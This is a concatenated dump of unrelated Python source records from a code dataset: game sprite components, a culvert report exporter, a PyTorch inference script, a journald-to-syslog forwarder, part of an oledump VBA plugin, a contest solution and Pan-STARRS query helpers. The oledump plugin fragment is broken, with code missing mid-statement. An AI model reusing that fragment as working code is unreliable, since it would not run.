RIGHT:\n\t\t\t\tself.play_animation(\"turn_left\")\n\n\t\t\tif self.current_animation.get_spritenr()+1 == self.current_animation.get_animation_length():\n\t\t\t\tself.state = ShStates.MOVE\n\t\t\t\t# Turn:\n\t\t\t\tif self.look_direction == LEFT:\n\t\t\t\t\tself.look_direction = RIGHT\n\t\t\t\t\tself.play_animation(\"walk_right\")\n\t\t\t\telse:\n\t\t\t\t\tself.look_direction = LEFT\n\t\t\t\t\tself.play_animation(\"walk_left\")\n\n\t\t# Update the current animation:\n\t\tself.current_animation.update()\n\n\t\t# Calculate the position of the image so its midbottom is aligned with the midbottom of the game_actor\n\t\tif self.look_direction == RIGHT:\n\t\t\tsurface_pos = self.current_animation.get_surface().get_rect(bottomleft = game_actor.rect.bottomleft)\n\t\telse:\n\t\t\tsurface_pos = self.current_animation.get_surface().get_rect(bottomright = game_actor.rect.bottomright)\n\n\t\t# Blit the current sprite to the screen:\n\t\tengine.graphics.blit(self.current_animation.get_surface(), surface_pos)\n\n\t\t# Update the other components:\n\t\tgame_actor.send_message(MSGN.STATE, self.state)\n\t\tgame_actor.send_message(MSGN.LOOKDIRECTION, self.look_direction)\n\n\tdef play_animation(self, animation_name):\n\t\t\"\"\"Plays an animation only if the wanted animation isn't\n\t\talready playing.\n\t\t\"\"\"\n\t\tif self.current_animation_name != animation_name:\n\t\t\tself.current_animation_name = animation_name\n\t\t\tself.current_animation = self.animations[self.current_animation_name]\n\t\t\tself.current_animation.reset()\n\t\t\tself.current_animation.update()\n\n\nclass MoveComponent(StatesComponent, VelocityComponent):\n\n\tdef __init__(self):\n\t\tsuper(MoveComponent, self).__init__()\n\t\tself.walk_speed = 0.5\n\t\tself.velocity = (0, 0)\n\n\tdef receive_message(self, name, value):\n\t\tsuper(MoveComponent, self).receive_message(name, value)\n\t\tif name == 
MSGN.VELOCITY:\n\t\t\tself.velocity = value\n\n\tdef update(self, game_actor, engine):\n\t\tif self.state == ShStates.MOVE:\n\t\t\tif self.look_direction == LEFT:\n\t\t\t\tself.velocity = -self.walk_speed, self.velocity[1]\n\t\t\telse:\n\t\t\t\tself.velocity = self.walk_speed, self.velocity[1]\n\n\t\telif self.state == ShStates.STAY or self.state == ShStates.TURN:\n\t\t\tself.velocity = 0, self.velocity[1]\n\n\t\tgame_actor.send_message(MSGN.VELOCITY, self.velocity)\n","repo_name":"Nearoo/Wario-Land-3","sub_path":"Components/SpearheadComponents.py","file_name":"SpearheadComponents.py","file_ext":"py","file_size_in_byte":5788,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"72"} +{"seq_id":"18923694604","text":"# (c) Nelen & Schuurmans. GPL licensed, see LICENSE.txt\n# -*- coding: utf-8 -*-\n\nfrom nens.gp import parse_arguments\nimport os\nimport sys\nimport logging\nimport nens.gp\nfrom dbfpy import dbf\nimport ConfigParser\nfrom jinja2 import Environment, PackageLoader\nfrom jinja2.utils import soft_unicode\nfrom datetime import datetime\nimport turtlebase.general\n\n\ndef do_isknown(value):\n return value or \"???\"\n\n\ndef do_pyformat(value, format):\n \"\"\"return float according to format\n \"\"\"\n\n try:\n if value == -9999:\n return \"???\"\n else:\n return soft_unicode(\"%\" + format) % value\n except TypeError:\n return \"???\"\n\n\ndef do_material(value):\n \"\"\"translate numeric material or return string\n \"\"\"\n\n try:\n return {'01': 'aluminium',\n '02': 'asbest-cement',\n '03': 'beton',\n '04': 'gegolfd plaatstaal',\n '17': 'metselwerk',\n '20': 'PVC',\n '21': 'staal',\n '99': 'overig',\n }[value]\n except (TypeError, KeyError):\n return value\n\n\ndef do_form(value):\n \"\"\"return float according to format\n \"\"\"\n\n try:\n return {'01': 'rond',\n '02': 'rechthoekig',\n '03': 'eivormig',\n '04': 'muil',\n '05': 'ellips',\n '06': 'heul',\n '99': 'onbekend',\n }[value]\n except (TypeError, KeyError):\n return value\n\ndef main(options=None, args=None):\n from turtlebase import mainutils\n \n log = logging.getLogger(__name__)\n gp = mainutils.create_geoprocessor()\n \n mainutils.log_header(__name__)\n\n if options is args is None:\n options, args = parse_arguments({1: ('arg', 0),\n 2: ('arg', 1),\n 3: ('arg', 2)})\n\n shape_file, output_dir, settings = args\n\n dbf_file_name = shape_file[:-3] + 'dbf'\n table = dbf.Dbf(dbf_file_name, readOnly=True)\n\n resources_dir = os.path.dirname(sys.argv[0])\n log.info(resources_dir)\n\n config = ConfigParser.ConfigParser()\n config.read(settings)\n\n env = Environment(loader=PackageLoader('__main__', resources_dir))\n env.filters['pyformat'] = do_pyformat\n env.filters['filter_material'] = do_material\n env.filters['filter_isknown'] = do_isknown\n template_svg = env.get_template('duiker.svg')\n\n output_graphs = os.path.join(output_dir, \"graph\")\n log.info(\"output graphs: %s\" % output_graphs)\n if not os.path.isdir(output_graphs):\n os.makedirs(output_graphs)\n\n for row in table:\n svg_info = {}\n for field in config.options('column.culvert'):\n if field == '-':\n continue\n db_field = config.get('column.culvert', field)\n if db_field == '-':\n svg_info[field] = \"\"\n continue\n try:\n svg_info[field] = row[db_field]\n except:\n ## column is configured but not in data, possibly\n ## using a configuration that is more than we need\n ## here.\n continue\n if svg_info[field] is None:\n svg_info[field] = \"\"\n if isinstance(svg_info['date'], datetime):\n svg_info['date'] = 
svg_info['date'].strftime('%Y-%m-%d')\n svg_info['has_diametre'] = (svg_info['profile_shape'] in ['rond'])\n\n svg_data = template_svg.render(svg_info)\n filename = os.path.join(output_graphs, svg_info['name'] + \".svg\")\n out = file(filename, \"w\")\n out.write(svg_data)\n out.close()\n\n location_svg = output_graphs + \"\\\\*.svg\"\n log.info('%s\\\\batik\\\\convert_svg_to_png.bat %s' % (os.path.dirname(sys.argv[0]), location_svg))\n os.system('%s\\\\batik\\\\convert_svg_to_png.bat %s' % (os.path.dirname(sys.argv[0]), location_svg))\n\n # Create CSV files\n output_csv = os.path.join(output_dir, \"csv\")\n log.info(\"output csv: %s\" % output_csv)\n if not os.path.isdir(output_csv):\n os.makedirs(output_csv)\n\n row = gp.SearchCursor(shape_file)\n log.info(\"Create CSV files\")\n for item in nens.gp.gp_iterator(row):\n #log.info(\" - export csv for: %s\" % item.GetValue('kwk_name'))\n\n output_file = os.path.join(output_csv, \"%s.csv\" % item.GetValue(config.get('column.culvert', 'name')))\n turtlebase.general.add_to_csv(output_file, [('Location: ', item.GetValue(config.get('column.culvert', 'name')))], \"wb\")\n turtlebase.general.add_to_csv(output_file, [('Vorm: ', item.GetValue(config.get('column.culvert', 'profile_shape')))], \"ab\")\n turtlebase.general.add_to_csv(output_file, [('Materiaal: ', item.GetValue(config.get('column.culvert', 'material')))], \"ab\")\n turtlebase.general.add_to_csv(output_file, [('Streefpeil: ', round(item.GetValue(config.get('column.culvert', 'target_level')), 2))], \"ab\")\n turtlebase.general.add_to_csv(output_file, [('Diameter: ', round(item.GetValue(config.get('column.culvert', 'diametre')), 2))], \"ab\")\n turtlebase.general.add_to_csv(output_file, [('Lengte: ', round(item.GetValue(config.get('column.culvert', 'length')), 2))], \"ab\")\n turtlebase.general.add_to_csv(output_file, [('BOB1: ', round(item.GetValue(config.get('column.culvert', 'bed_level_left')), 2))], \"ab\")\n turtlebase.general.add_to_csv(output_file, [('BOB2: ', round(item.GetValue(config.get('column.culvert', 'bed_level_right')), 2))], \"ab\")\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO, format='%(message)s',)\n\n from optparse import OptionParser\n usage = \"usage: %prog [options] shape_file output_dir config\"\n parser = OptionParser(usage=usage)\n (options, args) = parser.parse_args()\n main(options, args)\n\n","repo_name":"nens/turtle-rural","sub_path":"rural_culvertprofiles.py","file_name":"rural_culvertprofiles.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"9491793342","text":"import os\r\nimport numpy as np\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nfrom torchvision import datasets, transforms\r\nimport torchvision.models as models\r\nfrom torch.optim.lr_scheduler import StepLR\r\nfrom torch.utils.data import TensorDataset, DataLoader, Dataset\r\n\r\nimport json\r\nfrom PIL import Image\r\n\r\n\r\nPATH = './HW2_net_cos.pth'\r\nfile_path = 'test/test/'\r\n\r\n# Transform\r\n\r\ntransform_test = transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n])\r\n\r\n# Load dataset\r\n\r\n\r\nclass MyDataset(Dataset):\r\n def __init__(self, img_dir, img_list, transform):\r\n super(MyDataset, self).__init__()\r\n self.img_dir = img_dir\r\n self.img_list = img_list\r\n self.transform = transform\r\n\r\n def 
__len__(self):\r\n return len(self.img_list)\r\n\r\n def __getitem__(self, idx):\r\n img = Image.open(self.img_dir + self.img_list[idx])\r\n return self.transform(img)\r\n\r\n\r\nif __name__ == '__main__':\r\n submission = []\r\n net = torch.load(PATH)\r\n submission = []\r\n test_img_list = []\r\n output_list = {}\r\n test_img_list = os.listdir(\"test/test\")\r\n\r\n test_loader = DataLoader(MyDataset(\"test/test/\",\r\n test_img_list,\r\n transform_test),\r\n batch_size=1,\r\n shuffle=False,\r\n num_workers=0)\r\n\r\n with torch.no_grad():\r\n net.eval()\r\n for i, img in enumerate(test_loader, 0):\r\n pred = net(img)\r\n output_list[test_img_list[i]] = pred[0]\r\n\r\n for img_name in test_img_list:\r\n print(img_name)\r\n # the image_name is as same as the image_id\r\n image_id = int(img_name[:-4])\r\n # add each detection box infomation into list\r\n box_num = int(output_list[img_name]['boxes'].size()[0])\r\n for box in range(box_num):\r\n det_box_info = {}\r\n\r\n # An integer to identify the image\r\n det_box_info[\"image_id\"] = image_id\r\n\r\n # A list ( [left_x, top_y, width, height] )\r\n left = output_list[img_name][\"boxes\"][box][0].item()\r\n top = output_list[img_name][\"boxes\"][box][1].item()\r\n width = output_list[img_name][\"boxes\"][box][2].item() - left\r\n height = output_list[img_name][\"boxes\"][box][3].item() - top\r\n det_box_info[\"bbox\"] = [left, top, width, height]\r\n # Float number between 0 ~ 1 which means the confidence of the bbox\r\n det_box_info[\"score\"] = output_list[img_name][\"scores\"][box].item()\r\n\r\n # An integer which means the label class\r\n det_box_info[\"category_id\"] = output_list[img_name][\"labels\"][box].item() + 1\r\n print(det_box_info)\r\n submission.append(det_box_info)\r\n\r\n # Write the list to answer.json\r\n json_object = json.dumps(submission, indent=4)\r\n\r\n with open(\"answer.json\", \"w\") as outfile:\r\n outfile.write(json_object)\r\n","repo_name":"Mintair/VRDL_HW2","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43274704315","text":"#!/bin/python \n\n\"\"\"\nthis scripts pull log from journald then reassemble to syslog format and send to the udp port\n\nusage: $1 [[host] port]\nexample:\n$1 localhost\n$1 localhost 1514\n\"\"\"\nimport socket\nimport sys\nimport json\nimport os\nimport syslog\nimport datetime\n\nPORT=1514\nHOST=\"localhost\"\nFILE=\"./log.json\"\n\nGROUP=[\"SYSLOG_FACILITY\", \"SYSLOG_PID\", \"PRIORITY\", \"SYSLOG_IDENTIFIER\", \"MESSAGE\"]\n\ndef get_id(cursor):\n payload = dict([i.split('=') for i in cursor.split(';')])\n return payload['x']\n\ndef get_struct(obj):\n struct = {i: obj[i] for i in obj if i[0] != '_' and i not in GROUP}\n if len(struct) == 0:\n return ' -'\n ret = \" [test {}]\".format(\" \".join(i + '=' + json.dumps(j) for i, j in struct.items() if '\\n' not in j))\n return ret\n\ndef send_log(obj):\n try:\n pri = int(obj.get('SYSLOG_FACILITY', obj.get(\"PRIORITY\", 0))) + 8 * 10\n ts = datetime.datetime.fromtimestamp(int(obj['__REALTIME_TIMESTAMP']) / 1e6).isoformat() + 'Z'\n hostname = obj['_HOSTNAME']\n appname = obj.get('_EXE', '???')\n procid = obj['_PID']\n msgid = get_id(obj['__CURSOR'])\n \n data = \"<{}>1 {} {} {} {} {}\".format(pri, ts, hostname, appname, procid, msgid)\n data += get_struct(obj)\n data += ' ' + obj['MESSAGE']\n s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.sendto(data.encode(\"utf8\"), (HOST, 
PORT))\n    except:\n        print(obj)\n    # print(data)\n\n\ndef getLogs():\n    logs = []\n    if os.path.exists(FILE):\n        with open(FILE) as fp:\n            for num, line in enumerate(fp):\n                try:\n                    yield json.loads(line)\n                except ValueError:\n                    print(\"bad line {}\".format(num))\n    else:\n        # load data from journal daemon directly\n        pass\n\ndef genSyslog():\n    for log in getLogs():\n        send_log(log)\n\ndef main():\n    global HOST, PORT\n    if len(sys.argv) >= 3:\n        PORT = int(sys.argv[2])\n    if len(sys.argv) >= 2:\n        HOST = sys.argv[1]\n    \n    genSyslog()\n\nif __name__ == \"__main__\":\n    main()","repo_name":"pandada8/logd","sub_path":"scripts/journald-to-syslog.py","file_name":"journald-to-syslog.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9668300284","text":"#!/usr/bin/env python\n\n__description__ = 'VBA dir stream parser for oledump.py'\n__author__ = 'Didier Stevens'\n__version__ = '0.0.1'\n__date__ = '2023/04/23'\n\n\"\"\"\n\nSource code put in public domain by Didier Stevens, no Copyright\nhttps://DidierStevens.com\nUse at your own risk\n\nHistory:\n  2023/04/23: start\n\nTodo:\n  write parser for REFERENCECONTROL\n\"\"\"\n\n#https://interoperability.blob.core.windows.net/files/MS-OVBA/%5bMS-OVBA%5d.pdf\n\ndef ParseREFERENCEREGISTERED(data):\n    oStruct = cStruct(data)\n    stringSize = oStruct.Unpack(''), dataParsed))\n                if recordType == TERMINATOR:\n                    break\n            remainder = oStruct.GetBytes()\n            if remainder != b'':\n                result.append('Warning: remainder = %s' % repr(remainder))\n        else:\n            result.append('Decompression error')\n\n        self.ran = True\n\n        return result\n\nAddPlugin(cVBADir)\n","repo_name":"DidierStevens/DidierStevensSuite","sub_path":"plugin_vba_dir.py","file_name":"plugin_vba_dir.py","file_ext":"py","file_size_in_byte":8387,"program_lang":"python","lang":"en","doc_type":"code","stars":1733,"dataset":"github-code","pt":"72"} +{"seq_id":"15161156549","text":"H, W = map(int, input().split())\r\nS = [list(input()) for i in range(H)]\r\nmemo = [[None] * W for i in range(H)]\r\n\r\n\r\ndef dfs(x, y):\r\n    global memo\r\n    if y >= H or x >= W or S[y][x] == \"#\":\r\n        return True\r\n\r\n    if memo[y][x] is not None:\r\n        return memo[y][x]\r\n\r\n    result = False\r\n    if not dfs(x+1, y): result = True\r\n    if not dfs(x, y+1): result = True\r\n    if not dfs(x+1, y+1): result = True\r\n    memo[y][x] = result\r\n    return result\r\n\r\n\r\nprint(\"First\" if dfs(0, 0) else \"Second\")","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc038/B/2751451.py","file_name":"2751451.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"10709559033","text":"from __future__ import print_function\nimport numpy as np\nfrom astropy.table import Table\nimport requests\nfrom PIL import Image\nfrom io import BytesIO\nimport pylab\nimport os\nimport pandas as pd\nfrom astropy.io import fits\nfrom astropy.visualization import PercentileInterval, AsinhStretch\nimport csv\nfrom astropy.io import ascii\nfrom astropy.table import Table\nimport sys\nimport re\nimport pylab\nimport json\nimport requests\nfrom datetime import datetime\nfrom astropy import units as u\nfrom astropy.coordinates import Angle\ntry: # Python 3.x\n    from urllib.parse import quote as urlencode\n    from urllib.request import urlretrieve\nexcept ImportError: # Python 2.x\n    from urllib import pathname2url as urlencode\n    from urllib import urlretrieve\n\ntry: # Python 3.x\n    import 
http.client as httplib\nexcept ImportError:  # Python 2.x\n    import httplib\n# std lib\nfrom collections import OrderedDict\nfrom os import listdir\nfrom os.path import isfile, join\n# 3rd party\nfrom astropy import utils, io, convolution, wcs\nfrom astropy.visualization import make_lupton_rgb\nfrom astropy.coordinates import name_resolve\nfrom pyvo.dal import sia  # needed below for sia.SIAService\nimport pickle\n\ndef getAllPostageStamps(df, tempSize, path=\"/home/alexgagliano/Documents/Research/Transient_ML_Box/PS1_PostageStamps/pngs/\"):\n    for i in np.arange(len(df[\"rra\"])):\n        tempRA = df.loc[i, 'rra']\n        tempDEC = df.loc[i, 'rdec']\n        a = find_all(path+\"/%i.png\" % df.loc[i, 'objID'], path)\n        if not a:\n            img = getcolorim(tempRA, tempDEC, size=tempSize, filters=\"grizy\", format=\"png\")\n            img.save(path+\"/%i.png\" % df.loc[i, 'objID'])\n        print(\"Saved %i\"%(i))\n\ndef preview_image(i, ra, dec, rad, band):\n    a = find_all(\"PS1_ra={}_dec={}_{}arcsec_{}.fits\".format(ra, dec, rad, band), \".\")\n    hdul = fits.open(a[0])\n    image_file = get_pkg_data_filename(a[0])\n    image_data = fits.getdata(image_file, ext=0)\n    plt.figure()\n    plt.imshow(image_data,cmap='viridis')\n    plt.axis('off')\n    #plt.colorbar()\n    plt.savefig(\"PS1_%i_%s.png\" % (i, band))\n\ndef get_hosts(path, transient_fn, fn_Host, rad):\n    transient_df = pd.read_csv(path+transient_fn)\n    now = datetime.now()\n    dateStr = \"%i%.02i%.02i\" % (now.year,now.month,now.day)\n    dict_fn = os.path.splitext(fn_Host)[0] + \".p\"\n    find_host_info_PS1(transient_df, fn_Host, dict_fn, path, rad)\n    host_df = pd.read_csv(path+fn_Host)\n    host_df = host_df.drop_duplicates()\n    host_df.to_csv(path+os.path.splitext(fn_Host)[0]+\"_cleaned.csv\")\n\ndef find_all(name, path):\n    result = []\n    for root, dirs, files in os.walk(path):\n        if name in files:\n            result.append(os.path.join(root, name))\n    return result\n\ndef getimages(ra,dec,size=240,filters=\"grizy\"):\n\n    \"\"\"Query ps1filenames.py service to get a list of images\n\n    ra, dec = position in degrees\n    size = image size in pixels (0.25 arcsec/pixel)\n    filters = string with filters to include\n    Returns a table with the results\n    \"\"\"\n\n    service = \"https://ps1images.stsci.edu/cgi-bin/ps1filenames.py\"\n    url = (\"{service}?ra={ra}&dec={dec}&size={size}&format=fits\"\n           \"&filters={filters}\").format(**locals())\n    table = Table.read(url, format='ascii')\n    return table\n\n\ndef geturl(ra, dec, size=240, output_size=None, filters=\"grizy\", format=\"jpg\", color=False):\n\n    \"\"\"Get URL for images in the table\n\n    ra, dec = position in degrees\n    size = extracted image size in pixels (0.25 arcsec/pixel)\n    output_size = output (display) image size in pixels (default = size).\n                  output_size has no effect for fits format images.\n    filters = string with filters to include\n    format = data format (options are \"jpg\", \"png\" or \"fits\")\n    color = if True, creates a color image (only for jpg or png format).\n            Default is return a list of URLs for single-filter grayscale images.\n    Returns a string with the URL\n    \"\"\"\n\n    if color and format == \"fits\":\n        raise ValueError(\"color images are available only for jpg or png formats\")\n    if format not in (\"jpg\",\"png\",\"fits\"):\n        raise ValueError(\"format must be one of jpg, png, fits\")\n    table = getimages(ra,dec,size=size,filters=filters)\n    url = (\"https://ps1images.stsci.edu/cgi-bin/fitscut.cgi?\"\n           \"ra={ra}&dec={dec}&size={size}&format={format}\").format(**locals())\n    if output_size:\n        url = url + \"&output_size={}\".format(output_size)\n    # sort filters from red to blue\n    flist = 
[\"yzirg\".find(x) for x in table['filter']]\n table = table[np.argsort(flist)]\n if color:\n if len(table) > 3:\n # pick 3 filters\n table = table[[0,len(table)//2,len(table)-1]]\n for i, param in enumerate([\"red\",\"green\",\"blue\"]):\n url = url + \"&{}={}\".format(param,table['filename'][i])\n else:\n urlbase = url + \"&red=\"\n url = []\n for filename in table['filename']:\n url.append(urlbase+filename)\n return url\n\n\ndef getcolorim(ra, dec, size=240, output_size=None, filters=\"grizy\", format=\"jpg\"):\n\n \"\"\"Get color image at a sky position\n\n ra, dec = position in degrees\n size = extracted image size in pixels (0.25 arcsec/pixel)\n output_size = output (display) image size in pixels (default = size).\n output_size has no effect for fits format images.\n filters = string with filters to include\n format = data format (options are \"jpg\", \"png\")\n Returns the image\n \"\"\"\n\n if format not in (\"jpg\",\"png\"):\n raise ValueError(\"format must be jpg or png\")\n url = geturl(ra,dec,size=size,filters=filters,output_size=output_size,format=format,color=True)\n r = requests.get(url)\n im = Image.open(BytesIO(r.content))\n return im\n\n\ndef getgrayim(ra, dec, size=240, output_size=None, filter=\"g\", format=\"jpg\"):\n\n \"\"\"Get grayscale image at a sky position\n\n ra, dec = position in degrees\n size = extracted image size in pixels (0.25 arcsec/pixel)\n output_size = output (display) image size in pixels (default = size).\n output_size has no effect for fits format images.\n filter = string with filter to extract (one of grizy)\n format = data format (options are \"jpg\", \"png\")\n Returns the image\n \"\"\"\n\n if format not in (\"jpg\",\"png\"):\n raise ValueError(\"format must be jpg or png\")\n if filter not in list(\"grizy\"):\n raise ValueError(\"filter must be one of grizy\")\n url = geturl(ra,dec,size=size,filters=filter,output_size=output_size,format=format)\n r = requests.get(url[0])\n im = Image.open(BytesIO(r.content))\n return im\n\n\ndef get_PS1_Pic(ra, dec, rad, band):\n fitsurl = geturl(ra, dec, size=rad, filters=\"{}\".format(band), format=\"fits\")\n print(fitsurl[0])\n fh = fits.open(fitsurl[0])\n print(fh)\n fh.writeto('./fits/PS1_ra={}_dec={}_{}arcsec_{}.fits'.format(ra, dec, int(rad*0.25), band))\n\n# Data Lab\n#from dl import queryClient as qc\n#from dl.helpers.utils import convert\n\n# set up Simple Image Access (SIA) service\nDEF_ACCESS_URL = \"http://datalab.noao.edu/sia/des_dr1\"\nsvc = sia.SIAService(DEF_ACCESS_URL)\n\n##################### PS1 HELPER FUNCTIONS ############################################\ndef ps1metadata(table=\"mean\",release=\"dr1\",baseurl=\"https://catalogs.mast.stsci.edu/api/v0.1/panstarrs\"):\n \"\"\"Return metadata for the specified catalog and table\n\n Parameters\n ----------\n table (string): mean, stack, or detection\n release (string): dr1 or dr2\n baseurl: base URL for the request\n\n Returns an astropy table with columns name, type, description\n \"\"\"\n\n checklegal(table,release)\n url = \"{baseurl}/{release}/{table}/metadata\".format(**locals())\n r = requests.get(url)\n r.raise_for_status()\n v = r.json()\n # convert to astropy table\n tab = Table(rows=[(x['name'],x['type'],x['description']) for x in v],\n names=('name','type','description'))\n return tab\n\n\ndef mastQuery(request):\n \"\"\"Perform a MAST query.\n\n Parameters\n ----------\n request (dictionary): The MAST request json object\n\n Returns head,content where head is the response HTTP headers, and content is the returned data\"\"\"\n\n 
server='mast.stsci.edu'\n\n    # Grab Python Version\n    version = \".\".join(map(str, sys.version_info[:3]))\n\n    # Create Http Header Variables\n    headers = {\"Content-type\": \"application/x-www-form-urlencoded\",\n               \"Accept\": \"text/plain\",\n               \"User-agent\":\"python-requests/\"+version}\n\n    # Encoding the request as a json string\n    requestString = json.dumps(request)\n    requestString = urlencode(requestString)\n\n    # opening the https connection\n    conn = httplib.HTTPSConnection(server)\n\n    # Making the query\n    conn.request(\"POST\", \"/api/v0/invoke\", \"request=\"+requestString, headers)\n\n    # Getting the response\n    resp = conn.getresponse()\n    head = resp.getheaders()\n    content = resp.read().decode('utf-8')\n\n    # Close the https connection\n    conn.close()\n\n    return head,content\n\ndef resolve(name):\n    \"\"\"Get the RA and Dec for an object using the MAST name resolver\n\n    Parameters\n    ----------\n    name (str): Name of object\n\n    Returns RA, Dec tuple with position\"\"\"\n\n    resolverRequest = {'service':'Mast.Name.Lookup',\n                       'params':{'input':name,\n                                 'format':'json'\n                                },\n                      }\n    headers,resolvedObjectString = mastQuery(resolverRequest)\n    resolvedObject = json.loads(resolvedObjectString)\n    # The resolver returns a variety of information about the resolved object,\n    # however for our purposes all we need are the RA and Dec\n    try:\n        objRa = resolvedObject['resolvedCoordinate'][0]['ra']\n        objDec = resolvedObject['resolvedCoordinate'][0]['decl']\n    except IndexError as e:\n        raise ValueError(\"Unknown object '{}'\".format(name))\n    return (objRa, objDec)\n\ndef checklegal(table,release):\n    \"\"\"Checks if this combination of table and release is acceptable\n\n    Raises a ValueError exception if there is a problem\n    \"\"\"\n\n    releaselist = (\"dr1\", \"dr2\")\n    if release not in releaselist:\n        raise ValueError(\"Bad value for release (must be one of {})\".format(', '.join(releaselist)))\n    if release==\"dr1\":\n        tablelist = (\"mean\", \"stack\")\n    else:\n        tablelist = (\"mean\", \"stack\", \"detection\")\n    if table not in tablelist:\n        raise ValueError(\"Bad value for table (for {} must be one of {})\".format(release, \", \".join(tablelist)))\n\ndef ps1search(table=\"mean\",release=\"dr1\",format=\"csv\",columns=None,baseurl=\"https://catalogs.mast.stsci.edu/api/v0.1/panstarrs\", verbose=False,**kw):\n    \"\"\"Do a general search of the PS1 catalog (possibly without ra/dec/radius)\n\n    Parameters\n    ----------\n    table (string): mean, stack, or detection\n    release (string): dr1 or dr2\n    format: csv, votable, json\n    columns: list of column names to include (None means use defaults)\n    baseurl: base URL for the request\n    verbose: print info about request\n    **kw: other parameters (e.g., 'nDetections.min':2). 
Note this is required!\n \"\"\"\n\n data = kw.copy()\n if not data:\n raise ValueError(\"You must specify some parameters for search\")\n checklegal(table,release)\n if format not in (\"csv\",\"votable\",\"json\"):\n raise ValueError(\"Bad value for format\")\n url = \"{baseurl}/{release}/{table}.{format}\".format(**locals())\n if columns:\n # check that column values are legal\n # create a dictionary to speed this up\n dcols = {}\n for col in ps1metadata(table,release)['name']:\n dcols[col.lower()] = 1\n badcols = []\n for col in columns:\n if col.lower().strip() not in dcols:\n badcols.append(col)\n if badcols:\n raise ValueError('Some columns not found in table: {}'.format(', '.join(badcols)))\n # two different ways to specify a list of column values in the API\n # data['columns'] = columns\n data['columns'] = '[{}]'.format(','.join(columns))\n\n# either get or post works\n# r = requests.post(url, data=data)\n r = requests.get(url, params=data)\n\n if verbose:\n print(r.url)\n r.raise_for_status()\n if format == \"json\":\n return r.json()\n else:\n return r.text\n\n\ndef ps1cone(ra,dec,radius,table=\"stack\",release=\"dr1\",format=\"csv\",columns=None,baseurl=\"https://catalogs.mast.stsci.edu/api/v0.1/panstarrs\", verbose=False,**kw):\n \"\"\"Do a cone search of the PS1 catalog\n\n Parameters\n ----------\n ra (float): (degrees) J2000 Right Ascension\n dec (float): (degrees) J2000 Declination\n radius (float): (degrees) Search radius (<= 0.5 degrees)\n table (string): mean, stack, or detection\n release (string): dr1 or dr2\n format: csv, votable, json\n columns: list of column names to include (None means use defaults)\n baseurl: base URL for the request\n verbose: print info about request\n **kw: other parameters (e.g., 'nDetections.min':2)\n \"\"\"\n\n data = kw.copy()\n data['ra'] = ra\n data['dec'] = dec\n data['radius'] = radius\n return ps1search(table=table,release=release,format=format,columns=columns,\n baseurl=baseurl, verbose=verbose, **data)\n\n#########################END PS1 HELPER FUNCTIONS##############################################\n\ndef create_df(tns_loc):\n \"\"\"Combine all supernovae data into dataframe\"\"\"\n files = [f for f in listdir(tns_loc) if isfile(join(tns_loc, f))]\n arr = []\n for file in files:\n tempPD = pd.read_csv(tns_loc+file)\n arr.append(tempPD)\n df = pd.concat(arr)\n df = df.loc[df['RA'] != '00:00:00.000']\n df = df.drop_duplicates()\n df = df.replace({'Anon.': ''})\n df = df.replace({'2019-02-13.49': ''})\n df = df.apply(lambda x: x.str.strip() if x.dtype == \"object\" else x)\n return df\n #df.to_csv('SNe_TNS_061019.csv')\n\ndef query_ps1_noname(RA, DEC, rad):\n #print(\"Querying PS1 for nearest host...\")\n return ps1cone(RA,DEC,rad/3600,table=\"stack\",release=\"dr1\",format=\"csv\",columns=None,baseurl=\"https://catalogs.mast.stsci.edu/api/v0.1/panstarrs\", verbose=False)\n\ndef query_ps1_name(name, rad):\n #print(\"Querying PS1 with host name!\")\n [ra, dec] = resolve(name)\n return ps1cone(ra,dec,rad/3600,table=\"stack\",release=\"dr1\",format=\"csv\",columns=None,baseurl=\"https://catalogs.mast.stsci.edu/api/v0.1/panstarrs\", verbose=False)\n\n# Queries PS1 to find host info for each transient\n# Input: df - a dataframe of all spectroscopically classified transients in TNS\n# fn - the output data frame of all PS1 potential hosts\n# dict_fn - the dictionary matching candidate hosts in PS1 and transients\n# Output: N/A\ndef find_host_info_PS1(df, fn, dict_fn, path, rad):\n i = 0\n \"\"\"Querying PS1 for all objects within rad arcsec 
of SNe\"\"\"\n os.chdir(path)\n # SN_Host_PS1 - the dictionary to map SN IDs to nearby obj IDs in PS1\n SN_Host_PS1 = {}\n # PS1_queries - an array of relevant PS1 obj info\n PS1_queries = []\n for j, row in enumerate(df.itertuples(), 1):\n tempRA = Angle(row.RA, unit=u.hourangle)\n tempDEC = Angle(row.DEC, unit=u.deg)\n tempName = row.HostName\n a = ''\n if(row.HostName is ''): # and (int(row.DEC[0:3]) > -30)):\n a = query_ps1_noname(tempRA.degree,tempDEC.degree, rad)\n else:\n try:\n a = query_ps1_name(tempName, rad)\n except:\n a = query_ps1_noname(tempRA.degree,tempDEC.degree, rad)\n if a:\n a = ascii.read(a)\n a = a.to_pandas()\n PS1_queries.append(a)\n SN_Host_PS1[row.ID] = np.array(a['objID'])\n else:\n SN_Host_PS1[row.ID] = np.array([])\n\n # Print status messages every 10 lines\n if j%10 == 0:\n print(\"Processed {} of {} lines!\".format(j, len(df.ID)))\n #print(SN_Host_PS1)\n\n # Print every query to a file Note: this was done in order\n # to prevent the code crashing after processing 99% of the data\n # frame and losing everything. This allows for duplicates though,\n # so they should be removed before the file is used again\n if (len(PS1_queries) > 0):\n PS1_hosts = pd.concat(PS1_queries)\n PS1_hosts = PS1_hosts.drop_duplicates()\n PS1_queries = []\n else:\n print(\"No potential hosts found for this object...\")\n # Save host info\n if i == 0:\n PS1_hosts.to_csv(fn, header=True)\n i = 